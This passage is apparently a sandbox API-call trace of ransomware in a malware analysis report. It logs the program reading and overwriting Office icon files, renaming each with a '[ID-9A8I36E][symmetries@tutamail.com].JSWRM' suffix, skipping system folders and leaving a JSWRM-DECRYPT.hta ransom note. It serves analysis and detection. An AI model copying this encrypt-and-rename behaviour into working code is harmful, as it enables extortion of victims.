lpDistanceToMoveHigh=0x0) returned 0x0 [0131.721] ReadFile (in: hFile=0x314, lpBuffer=0x22d530, nNumberOfBytesToRead=0x6b0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesRead=0x345e534*=0x6b0, lpOverlapped=0x0) returned 1 [0131.723] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.723] WriteFile (in: hFile=0x314, lpBuffer=0x22d530*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x22d530*, lpNumberOfBytesWritten=0x345e530*=0x6b0, lpOverlapped=0x0) returned 1 [0131.723] CloseHandle (hObject=0x314) returned 1 [0131.723] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\INCOMING.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\incoming.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\INCOMING.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\incoming.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.724] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2f7aa31, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2f7aa31, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2f7aa31, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="INDOMAIN.ICO", cAlternateFileName="")) returned 1 [0131.724] lstrcmpiW (lpString1="INDOMAIN.ICO", lpString2=".") returned 1 [0131.724] lstrcmpiW (lpString1="INDOMAIN.ICO", lpString2="..") returned 1 [0131.724] lstrcmpiW (lpString1="INDOMAIN.ICO", lpString2="...") returned 1 [0131.724] lstrcmpiW (lpString1="INDOMAIN.ICO", lpString2="windows") returned -1 [0131.724] lstrcmpiW (lpString1="INDOMAIN.ICO", lpString2="recovery") returned -1 [0131.724] lstrcmpiW (lpString1="INDOMAIN.ICO", lpString2="perflogs") returned -1 [0131.724] lstrcmpiW (lpString1="INDOMAIN.ICO", lpString2="documents and settings") returned 1 [0131.724] lstrcmpiW (lpString1="INDOMAIN.ICO", lpString2="$RECYCLE.BIN") returned 1 [0131.724] lstrcmpiW (lpString1="INDOMAIN.ICO", lpString2="system volume information") returned -1 [0131.724] lstrcmpiW (lpString1="INDOMAIN.ICO", lpString2="msocache") returned -1 [0131.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INDOMAIN.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0131.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INDOMAIN.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INDOMAIN.ICO", lpUsedDefaultChar=0x0) returned 12 [0131.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INDOMAIN.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0131.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="INDOMAIN.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INDOMAIN.ICO", lpUsedDefaultChar=0x0) returned 12 [0131.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.724] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\INDOMAIN.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\indomain.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.726] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=318) returned 1 [0131.726] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.726] ReadFile (in: hFile=0x314, lpBuffer=0x244e58, nNumberOfBytesToRead=0x130, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x244e58*, lpNumberOfBytesRead=0x345e534*=0x130, lpOverlapped=0x0) returned 1 [0131.727] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.727] WriteFile (in: hFile=0x314, lpBuffer=0x244e58*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x244e58*, lpNumberOfBytesWritten=0x345e530*=0x130, lpOverlapped=0x0) returned 1 [0131.727] CloseHandle (hObject=0x314) returned 1 [0131.727] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\INDOMAIN.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\indomain.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\INDOMAIN.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\indomain.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.728] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45096d52, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x45096d52, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x45096d52, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0131.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0131.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0131.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0131.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0131.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0131.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0131.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0131.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0131.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0131.728] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0131.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0131.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0131.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0131.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0131.728] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0df27d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf0df27d3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa2e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="MAIL.ICO", cAlternateFileName="")) returned 1 [0131.728] lstrcmpiW (lpString1="MAIL.ICO", lpString2=".") returned 1 [0131.728] lstrcmpiW (lpString1="MAIL.ICO", lpString2="..") returned 1 [0131.728] lstrcmpiW (lpString1="MAIL.ICO", lpString2="...") returned 1 [0131.728] lstrcmpiW (lpString1="MAIL.ICO", lpString2="windows") returned -1 [0131.729] lstrcmpiW (lpString1="MAIL.ICO", lpString2="recovery") returned -1 [0131.729] lstrcmpiW (lpString1="MAIL.ICO", lpString2="perflogs") returned -1 [0131.729] lstrcmpiW (lpString1="MAIL.ICO", lpString2="documents and settings") returned 1 [0131.729] lstrcmpiW (lpString1="MAIL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0131.729] lstrcmpiW (lpString1="MAIL.ICO", lpString2="system volume information") returned -1 [0131.729] lstrcmpiW (lpString1="MAIL.ICO", lpString2="msocache") returned -1 [0131.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAIL.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0131.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAIL.ICO", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAIL.ICO", lpUsedDefaultChar=0x0) returned 8 [0131.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAIL.ICO", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0131.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MAIL.ICO", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAIL.ICO", lpUsedDefaultChar=0x0) returned 8 [0131.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.729] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.729] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\MAIL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\mail.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.730] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2606) returned 1 [0131.730] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.730] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0xa20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e534*=0xa20, lpOverlapped=0x0) returned 1 [0131.903] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.903] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e530*=0xa20, lpOverlapped=0x0) returned 1 [0131.903] CloseHandle (hObject=0x314) returned 1 [0131.903] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\MAIL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\mail.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\MAIL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\mail.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.906] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9e572fe, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9e572fe, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9e7d566, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="MANUAL.ICO", cAlternateFileName="")) returned 1 [0131.906] lstrcmpiW (lpString1="MANUAL.ICO", lpString2=".") returned 1 [0131.906] lstrcmpiW (lpString1="MANUAL.ICO", lpString2="..") returned 1 [0131.906] lstrcmpiW (lpString1="MANUAL.ICO", lpString2="...") returned 1 [0131.906] lstrcmpiW (lpString1="MANUAL.ICO", lpString2="windows") returned -1 [0131.906] lstrcmpiW (lpString1="MANUAL.ICO", lpString2="recovery") returned -1 [0131.906] lstrcmpiW (lpString1="MANUAL.ICO", lpString2="perflogs") returned -1 [0131.906] lstrcmpiW (lpString1="MANUAL.ICO", lpString2="documents and settings") returned 1 [0131.906] lstrcmpiW (lpString1="MANUAL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0131.906] lstrcmpiW (lpString1="MANUAL.ICO", lpString2="system volume information") returned -1 [0131.906] lstrcmpiW (lpString1="MANUAL.ICO", lpString2="msocache") returned -1 [0131.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANUAL.ICO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0131.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANUAL.ICO", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MANUAL.ICO", lpUsedDefaultChar=0x0) returned 10 [0131.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANUAL.ICO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0131.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANUAL.ICO", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MANUAL.ICO", lpUsedDefaultChar=0x0) returned 10 [0131.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\MANUAL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\manual.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.907] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=318) returned 1 [0131.907] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.907] ReadFile (in: hFile=0x314, lpBuffer=0x244d20, nNumberOfBytesToRead=0x130, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x244d20*, lpNumberOfBytesRead=0x345e534*=0x130, lpOverlapped=0x0) returned 1 [0131.908] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.908] WriteFile (in: hFile=0x314, lpBuffer=0x244d20*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x244d20*, lpNumberOfBytesWritten=0x345e530*=0x130, lpOverlapped=0x0) returned 1 [0131.908] CloseHandle (hObject=0x314) returned 1 [0131.909] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\MANUAL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\manual.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\MANUAL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\manual.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.910] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37869c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb2e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="messageboxalert.ico", cAlternateFileName="MESSAG~3.ICO")) returned 1 [0131.910] lstrcmpiW (lpString1="messageboxalert.ico", lpString2=".") returned 1 [0131.910] lstrcmpiW (lpString1="messageboxalert.ico", lpString2="..") returned 1 [0131.910] lstrcmpiW (lpString1="messageboxalert.ico", lpString2="...") returned 1 [0131.910] lstrcmpiW (lpString1="messageboxalert.ico", lpString2="windows") returned -1 [0131.910] lstrcmpiW (lpString1="messageboxalert.ico", lpString2="recovery") returned -1 [0131.910] lstrcmpiW (lpString1="messageboxalert.ico", lpString2="perflogs") returned -1 [0131.910] lstrcmpiW (lpString1="messageboxalert.ico", lpString2="documents and settings") returned 1 [0131.910] lstrcmpiW (lpString1="messageboxalert.ico", lpString2="$RECYCLE.BIN") returned 1 [0131.910] lstrcmpiW (lpString1="messageboxalert.ico", lpString2="system volume information") returned -1 [0131.910] lstrcmpiW (lpString1="messageboxalert.ico", lpString2="msocache") returned -1 [0131.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messageboxalert.ico", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0131.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messageboxalert.ico", cchWideChar=19, lpMultiByteStr=0x241290, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messageboxalert.ico", lpUsedDefaultChar=0x0) returned 19 [0131.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messageboxalert.ico", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0131.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messageboxalert.ico", cchWideChar=19, lpMultiByteStr=0x2412e0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messageboxalert.ico", lpUsedDefaultChar=0x0) returned 19 [0131.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\messageboxalert.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\messageboxalert.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.911] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2862) returned 1 [0131.911] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.911] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xb20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xb20, lpOverlapped=0x0) returned 1 [0131.913] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.913] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xb20, lpOverlapped=0x0) returned 1 [0131.913] CloseHandle (hObject=0x314) returned 1 [0131.913] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\messageboxalert.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\messageboxalert.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\messageboxalert.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\messageboxalert.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.914] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x765018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x765018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x765018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb2e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="messageboxerror.ico", cAlternateFileName="MESSAG~2.ICO")) returned 1 [0131.914] lstrcmpiW (lpString1="messageboxerror.ico", lpString2=".") returned 1 [0131.914] lstrcmpiW (lpString1="messageboxerror.ico", lpString2="..") returned 1 [0131.914] lstrcmpiW (lpString1="messageboxerror.ico", lpString2="...") returned 1 [0131.915] lstrcmpiW (lpString1="messageboxerror.ico", lpString2="windows") returned -1 [0131.915] lstrcmpiW (lpString1="messageboxerror.ico", lpString2="recovery") returned -1 [0131.915] lstrcmpiW (lpString1="messageboxerror.ico", lpString2="perflogs") returned -1 [0131.915] lstrcmpiW (lpString1="messageboxerror.ico", lpString2="documents and settings") returned 1 [0131.915] lstrcmpiW (lpString1="messageboxerror.ico", lpString2="$RECYCLE.BIN") returned 1 [0131.915] lstrcmpiW (lpString1="messageboxerror.ico", lpString2="system volume information") returned -1 [0131.915] lstrcmpiW (lpString1="messageboxerror.ico", lpString2="msocache") returned -1 [0131.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messageboxerror.ico", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0131.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messageboxerror.ico", cchWideChar=19, lpMultiByteStr=0x240f48, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messageboxerror.ico", lpUsedDefaultChar=0x0) returned 19 [0131.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messageboxerror.ico", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0131.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messageboxerror.ico", cchWideChar=19, lpMultiByteStr=0x241100, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messageboxerror.ico", lpUsedDefaultChar=0x0) returned 19 [0131.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 